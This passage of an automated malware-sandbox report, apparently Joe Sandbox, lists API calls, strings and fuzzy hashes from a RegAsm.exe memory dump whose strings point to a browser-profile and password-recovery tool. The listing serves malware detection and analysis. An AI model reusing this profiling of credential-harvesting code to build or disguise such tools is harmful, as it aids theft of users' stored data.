                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                • GetDC.USER32 ref: 004140E3
                                                                • wcslen.MSVCRT ref: 00414123
                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                • String ID: %s:$EDIT$STATIC
                                                                • API String ID: 2080319088-3046471546
                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                APIs
                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                • memset.MSVCRT ref: 00413292
                                                                • memset.MSVCRT ref: 004132B4
                                                                • memset.MSVCRT ref: 004132CD
                                                                • memset.MSVCRT ref: 004132E1
                                                                • memset.MSVCRT ref: 004132FB
                                                                • memset.MSVCRT ref: 00413310
                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                • memset.MSVCRT ref: 004133C0
                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                • memcpy.MSVCRT ref: 004133FC
                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                Strings
                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                • {Unknown}, xrefs: 004132A6
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                • API String ID: 4111938811-1819279800
                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                • SetCursor.USER32(00000000), ref: 0040129E
                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                • String ID:
                                                                • API String ID: 829165378-0
                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                APIs
                                                                • memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                • memset.MSVCRT ref: 00404200
                                                                • memset.MSVCRT ref: 00404215
                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                • wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 0040426E
                                                                • memset.MSVCRT ref: 004042CD
                                                                • memset.MSVCRT ref: 004042E2
                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                • wcscpy.MSVCRT ref: 00404311
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                • API String ID: 2454223109-1580313836
                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                • API String ID: 1607361635-601624466
                                                                • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintf$memset$wcscpy
                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                • API String ID: 2000436516-3842416460
                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                APIs
                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                • String ID:
                                                                • API String ID: 1043902810-0
                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                APIs
                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                • memset.MSVCRT ref: 0040E380
                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                • memcpy.MSVCRT ref: 0040E3EC
                                                                • memcpy.MSVCRT ref: 0040E407
                                                                • memcpy.MSVCRT ref: 0040E422
                                                                • memcpy.MSVCRT ref: 0040E43D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                • API String ID: 3073804840-2252543386
                                                                • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                • API String ID: 2899246560-1542517562
                                                                • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                • String ID:
                                                                • API String ID: 3715365532-3916222277
                                                                • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                APIs
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                • memset.MSVCRT ref: 004085CF
                                                                • memset.MSVCRT ref: 004085F1
                                                                • memset.MSVCRT ref: 00408606
                                                                • strcmp.MSVCRT ref: 00408645
                                                                • _mbscpy.MSVCRT ref: 004086DB
                                                                • _mbscpy.MSVCRT ref: 004086FA
                                                                • memset.MSVCRT ref: 0040870E
                                                                • strcmp.MSVCRT ref: 0040876B
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                • String ID: ---
                                                                • API String ID: 3437578500-2854292027
                                                                • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                APIs
                                                                • memset.MSVCRT ref: 0041087D
                                                                • memset.MSVCRT ref: 00410892
                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                • String ID:
                                                                • API String ID: 1010922700-0
                                                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                APIs
                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                • malloc.MSVCRT ref: 004186B7
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                • malloc.MSVCRT ref: 004186FE
                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@$FullNamePath$malloc$Version
                                                                • String ID: |A
                                                                • API String ID: 4233704886-1717621600
                                                                • Opcode ID: 539f2c4f40ac40545d02d8778def220405c4216a3daad879b42070153127b3fe
                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                • Opcode Fuzzy Hash: 539f2c4f40ac40545d02d8778def220405c4216a3daad879b42070153127b3fe
                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmp
                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                • API String ID: 2081463915-1959339147
                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                • memcpy.MSVCRT ref: 0041234D
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                • String ID:
                                                                • API String ID: 1700100422-0
                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                APIs
                                                                • memcpy.MSVCRT ref: 004115C8
                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                • SendMessageW.USER32 ref: 004116B4
                                                                • SendMessageW.USER32(?,0000040B,00001001), ref: 004116C7
                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$AttributesClipboardFileFormatPathRegisterShowTempWindowmemcpywcslen
                                                                • String ID: /nosaveload$commdlg_FindReplace$report.html$xE
                                                                • API String ID: 3908809218-4024464577
                                                                • Opcode ID: a774f7cc64a66d76c2878fa7fc0b5fe1ddc14e155a8a6c417307b3c4759b6bc4
                                                                • Instruction ID: 6d732b5fcaa037f49c13030d3dc29cfa0fc559a1b11e8dfbf4fcf4bd20789011
                                                                • Opcode Fuzzy Hash: a774f7cc64a66d76c2878fa7fc0b5fe1ddc14e155a8a6c417307b3c4759b6bc4
